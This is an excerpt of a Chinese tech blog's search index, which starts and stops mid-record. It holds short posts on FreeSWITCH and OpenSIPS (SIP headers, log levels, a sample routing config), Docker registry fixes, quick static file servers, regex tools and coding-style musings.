1","title":"MySql学习"},{"content":"\n自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}\n","permalink":"https://wdd.js.org/freeswitch/get-sip-header/","summary":"自定义SIP消息头如何从通道变量中获取? if you pass a header variable called type from the proxy server, it will get displayed as variable_sip_h_type in FreeSWITCH™. To access that variable, you should strip off the variable_, and just do ${sip_h_type}","title":"通道变量与SIP 消息头"},{"content":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓\n","permalink":"https://wdd.js.org/posts/2019/07/fabbky/","summary":"【少年】慈母手中线,游子身上衣【毕业】浔阳江头夜送客,枫叶荻花秋瑟瑟【实习】千呼万唤始出来,犹抱琵琶半遮面【工作加班】衣带渐宽终不悔,为伊消得人憔悴【同学结婚】昔别君未婚,儿女忽成行【表白】欲得周郎顾,时时误拂弦【恋爱】在天愿作比翼鸟,在地愿为连理枝【分手】别有幽愁暗恨生,此时无声胜有声【春节回家】近乡情更怯,不敢问来人【车站遇友】马上相逢无纸笔,凭君传语报平安【外婆去世】洛阳亲友如相问,一片冰心在玉壶【节后会沪】两岸猿声啼不住,动车已过万重山【情人节】天阶夜色凉如水,坐看牵牛织女星【重游南京】浮云一别后,流水十年间【秦淮灯会】云想衣裳花想容,春风拂槛露华浓","title":"无题 再读唐诗宋词"},{"content":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","permalink":"https://wdd.js.org/posts/2019/07/gzfn7t/","summary":"汤婆婆给千寻签订了契约,之后千寻的名字被抹去了,每个人都叫千寻小千,甚至千寻自己,也忘记了自己原来的名字。\n但是只有白先生告诫千寻,一定要记住自己的名字,否则再也无法回到原来的世界。而白先生自己,就是那个已经无法回到原来世界的人。\n最重要的是记住自己的名字 名字要有意义 不要使用缩写,缩写会让你忘记自己的原来的名字 没有工作的人,会变成妖怪的 没有用的变量,会变成垃圾 别吃得太胖,会被杀掉的 别占用太多内存,会被操作系统给杀掉的 ","title":"从千与千寻谈编程风格"},{"content":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。\n","permalink":"https://wdd.js.org/posts/2019/07/osb460/","summary":"Photo by Blair Fraser on Unsplash\n从头开发一个软件只是小儿科,改进一个程序才显真本事。《若为自由故 自由软件之父理查德·斯托曼传》\n每个人都有从零开发软件的处女情结,但是事实上我们大多数时候都在维护别人的代码。\n所以,别人写的代码如何糟糕,你再抱怨也是无意义的。\n从内心中问自己,你究竟是在抱怨别人,还是不敢面对自己脆弱的内心。\n老代码的意义 廉颇老矣,尚能饭否。\n老代码的有很多缺点,如难以维护,逻辑混乱。但是老代码有唯一的好处,就是老代码经过生产环境的洗礼。这至少能证明老代码能够稳定运行,不出问题。\n东西,如果不出问题,就不要动它。\n老代码可能存在哪些问题 老代码的问题,就是我们重构的点。首先我们要明确,老代码中有哪些问题。\n模块性不强,重复代码太多 逻辑混乱,业务逻辑和框架逻辑混杂 注释混乱:特别要小心,很多老代码中的注释都可能不知道祖传多少代了。如果你要按着注释去理解,很可能南辕北辙,走火入魔。按照代码的执行去理解业务逻辑,而不是按照注释。 配置性的硬代码和业务逻辑混杂,这个是需要在后期抽离的 如果你无法理解,请勿重构 带着respect, 也带着质疑,阅读并理解老代码。取其精华,去其糟粕。如果你还不理解老代码,就别急着重构它,让子弹飞一会。\n等自己能够理解老代码时,再去重构。我相信在理解基础上重构,会更快,也更安全。\n不要大段改写,要见缝插针 不要在老代码中直接写自己的代码,应该使用函数。\n在老代码中改动一行,调用自己写的函数。\n几乎每种语言中都有函数这种组织代码的形式,通过见缝插针调用函数的方式。能够尽量减少老代码的改动,如果出现问题,也比较容易调试。","title":"如何维护老代码?"},{"content":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/\n","permalink":"https://wdd.js.org/fe/regex-tools/","summary":"regex101: 功能最强 https://regex101.com/\nregex101的功能最强,支持php, js, python, 和go的正则表达式\nRegulex:正则可视化 https://jex.im/regulex/#!flags=\u0026amp;re=%5E(a%7Cb)*%3F%24\nregulex仅支持js的正则,\nregexper:正则可视化 https://regexper.com/\npyregex:专注python正则 http://www.pyregex.com/","title":"Regex Tools"},{"content":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server ","permalink":"https://wdd.js.org/posts/2019/07/stxzl6/","summary":"基于python # 基于python2 python -m SimpleHTTPServer 8088 # 基于python3 python -m http.server 8088 基于Node.js https://github.com/zeit/serve https://github.com/http-party/http-server ","title":"1秒搭建静态文件服务器"},{"content":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","permalink":"https://wdd.js.org/posts/2019/07/ya30bi/","summary":"上传文件 import requests headers = { \u0026#34;ssid\u0026#34;:\u0026#34;1234\u0026#34; } files = {\u0026#39;file\u0026#39;: open(\u0026#39;yourfile.tar.gz\u0026#39;, \u0026#39;rb\u0026#39;)} url=\u0026#34;http://localhost:1345/fileUpload/\u0026#34; r = requests.post(url, files=files, headers=headers) print(r.status_code) ","title":"python request 库学习"},{"content":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","permalink":"https://wdd.js.org/freeswitch/fs-log-level/","summary":"fs日志级别\n0 \u0026#34;CONSOLE\u0026#34;, 1 \u0026#34;ALERT\u0026#34;, 2 \u0026#34;CRIT\u0026#34;, 3 \u0026#34;ERR\u0026#34;, 4 \u0026#34;WARNING\u0026#34;, 5 \u0026#34;NOTICE\u0026#34;, 6 \u0026#34;INFO\u0026#34;, 7 \u0026#34;DEBUG\u0026#34; 日志级别设置的越高,显示的日志越多\n在autoload_configs/switch.conf.xml 设置了一些快捷键,可以在fs_cli中使用\nF7将日志级别设置为0,显示的日志最少 F8将日志级别设置为7, 显示日志最多 同时也可以使用 console loglevel指令自定义设置级别\nconsole loglevel 1 console loglevel notice 参考 https://freeswitch.org/confluence/display/FREESWITCH/Troubleshooting+Debugging ","title":"fs日志级别"},{"content":" from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 一般情况下,sip消息再传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;. If there is both a URI parameter and a tag, then the URI including any parameters must be enclosed in \u0026lt; \u0026gt;. Examples are shown in Table 6.8. A From tag was optional in RFC 2543 but is mandatory to include in RFC 3261.\nto字段:**The To header field is a required header field in every SIP message used to indicate the recipient of the request. Any responses generated by a UA will contain this header field with the addition of a tag. (Note that an RFC 2543 client will typically only generate a tag if more than one Via header field is present in the request.) Any response generated by a proxy must have a tag added to the To header field. A tag added to the header field in a 200 OK response is used through- out the call and incorporated into the dialog. The To header field URI is never used for routing—the Request-URI is used for this purpose. An optional display name can be present in the header field, in which case the SIP URI is enclosed in \u0026lt; \u0026gt;. If the URI contains any parameters or username parameters, the URI must be enclosed in \u0026lt; \u0026gt; even if no display name is present. The compact form of the header field is t. Examples are shown in Table 6.12.\n上面的信令图属于一个dialog, 并且包含三个事务\ninvite 到 200 ok属于一个事务 ack是单独的一个事务 bye和200 ok属于一个事务 在同一个事务中,from和to中的sip url和tag都是相同的,但是对于不同的事务,from和to头的url和tag会相反。\n# 事务1: INVITE 180 200 From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务2: ACK From: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa To: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb # 事务3: BYE 200 ok # 由于事务3的发起方是B, 所以 From: \u0026lt;sip:b@test.com\u0026gt;;tag=bbb To: \u0026lt;sip:a@test.com\u0026gt;;tag=aaa 所以在处理OpenSIPS脚本的时候,特别是关于from_tag和to_tag的处理的时候,我们不能先入为主的认为初始化和序列化的的所有请求里from_tag和to_tag都是不变的。 也不能先入为主的认为from_url和 to_url是一成不变的。\n所以我们就必须深入的认识到,from和to实际上是标志着这个事务的方向。而不是dialog的方向。\n【重点】初始化请求和序列化请求\nrfc 3261 request url The initial Request-URI of the message SHOULD be set to the value of the URI in the To field. One notable exception is the REGISTER method; behavior for setting the Request-URI of REGISTER is given in Section 10. It may also be undesirable for privacy reasons or convenience to set these fields to the same value (especially if the originating UA expects that the Request-URI will be changed during transit). In some special circumstances, the presence of a pre-existing route set can affect the Request-URI of the message. A pre-existing route set is an ordered set of URIs that identify a chain of servers, to which a UAC will send outgoing requests that are outside of a dialog. Commonly, they are configured on the UA by a user or service provider manually, or through some other non-SIP mechanism. When a provider wishes to configure a UA with an outbound proxy, it is RECOMMENDED that this be done by providing it with a pre-existing route set with a single URI, that of the outbound proxy. When a pre-existing route set is present, the procedures for populating the Request-URI and Route header field detailed in Section 12.2.1.1 MUST be followed (even though there is no dialog), using the desired Request-URI as the remote target URI.\n","permalink":"https://wdd.js.org/opensips/ch1/from-to-request-url/","summary":"from字段用来标记请求的发起者ID to字段用来标记请求接受者的ID to字段并不能用于路由,request-url可以用来路由 一般情况下,sip消息再传输过程中,from和to字段都不会改,而request-url很可能会因为路由而改变 对于最初的请求,除了注册请求之外,request-url和to字段中的url一致 from字段:The From header field is a required header field that indicates the originator of the request. It is one of two addresses used to identify the dialog. The From header field contains a URI, but it may not contain the transport, maddr, or ttl URI parameters. A From header field may contain a tag used to identify a particular call. A From header field may contain a display name, in which case the URI is enclosed in \u0026lt; \u0026gt;.","title":"from vs to vs request-url之间的关系"},{"content":"建议日志格式 xlog(\u0026#34;$rm $fu-\u0026gt;$tu:$cfg_line some msg\u0026#34;) 日志级别 L_ALERT (-3) L_CRIT (-2) L_ERR (-1) - this is used by default if log_level is omitted L_WARN (1) L_NOTICE (2) L_INFO (3) L_DBG (4) 日志级别如果设置为2, 那么只会打印小于等于2的日志。默认使用xlog(\u0026ldquo;hello\u0026rdquo;), 那么日志级别就会是L_ERR\n生产环境建议将日志界别调整到-1\n1.x的opensips使用 debug=3 设置日志级别2.x的opensips使用 log_level=3 设置日志级别\n动态设置日志级别 在程序运行时,可以通过opensipctl 命令动态设置日志级别\nopensipsctl fifo log_level -2 最好使用日志级别 不要为了简便,都用 xlog(\u0026#34;msg\u0026#34;) 如果msg是信息级别,用xlog(\u0026#34;L_INFO\u0026#34;, \u0026#34;msg\u0026#34;) 如果msg是错误信息,则使用xlog(\u0026#34;msg\u0026#34;) ","permalink":"https://wdd.js.org/opensips/ch5/xlog-level/","summary":"建议日志格式 xlog(\u0026#34;$rm $fu-\u0026gt;$tu:$cfg_line some msg\u0026#34;) 日志级别 L_ALERT (-3) L_CRIT (-2) L_ERR (-1) - this is used by default if log_level is omitted L_WARN (1) L_NOTICE (2) L_INFO (3) L_DBG (4) 日志级别如果设置为2, 那么只会打印小于等于2的日志。默认使用xlog(\u0026ldquo;hello\u0026rdquo;), 那么日志级别就会是L_ERR\n生产环境建议将日志界别调整到-1\n1.x的opensips使用 debug=3 设置日志级别2.x的opensips使用 log_level=3 设置日志级别\n动态设置日志级别 在程序运行时,可以通过opensipctl 命令动态设置日志级别\nopensipsctl fifo log_level -2 最好使用日志级别 不要为了简便,都用 xlog(\u0026#34;msg\u0026#34;) 如果msg是信息级别,用xlog(\u0026#34;L_INFO\u0026#34;, \u0026#34;msg\u0026#34;) 如果msg是错误信息,则使用xlog(\u0026#34;msg\u0026#34;) ","title":"日志xlog"},{"content":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","permalink":"https://wdd.js.org/posts/2019/07/pxdvcx/","summary":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","title":"编码规则"},{"content":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了的说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的链接,所以路由器一般至少会链接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 一个Web服务器的工作过程s step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接受完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","permalink":"https://wdd.js.org/network/graph-network/","summary":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了的说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的链接,所以路由器一般至少会链接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 一个Web服务器的工作过程s step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接受完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","title":"图解通信网络 第二版"},{"content":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","permalink":"https://wdd.js.org/posts/2019/07/fpbkzg/","summary":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","title":"Docker相关问题及解决方案"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME listen=udp:10.0.2.8:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;fraud_detection.so\u0026#34; modparam(\u0026#34;fraud_detection\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;cachedb_local.so\u0026#34; #loadmodule \u0026#34;aaa_radius.so\u0026#34; #modparam(\u0026#34;aaa_radius\u0026#34;,\u0026#34;radius_config\u0026#34;,\u0026#34;modules/acc/etc/radius/radiusclient.conf\u0026#34;) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ #modparam(\u0026#34;acc\u0026#34;, \u0026#34;aaa_url\u0026#34;, \u0026#34;radius:modules/acc/etc/radius/radiusclient.conf\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_bye_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) /* account triggers (flags) */ loadmodule \u0026#34;avpops.so\u0026#34; modparam(\u0026#34;avpops\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;1 mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; modparam(\u0026#34;db_mysql\u0026#34;, \u0026#34;exec_query_threshold\u0026#34;, 500000) loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;rest_client.so\u0026#34; loadmodule \u0026#34;dispatcher.so\u0026#34; modparam(\u0026#34;dispatcher\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) ####### Routing Logic ######## # main request routing logic route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (from_uri==myself) { } else { # if caller is not local, then called number must be local } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed|failed\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!check_fraud(\u0026#34;$fU\u0026#34;, \u0026#34;$rU\u0026#34;, \u0026#34;2\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; } $du = \u0026#34;sip:10.0.2.8:7050\u0026#34;; route(relay); } route [relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } route [ds_route] { xlog(\u0026#34;foo\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } event_route [E_FRD_WARNING] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_WARNING: $var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_cpm++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { 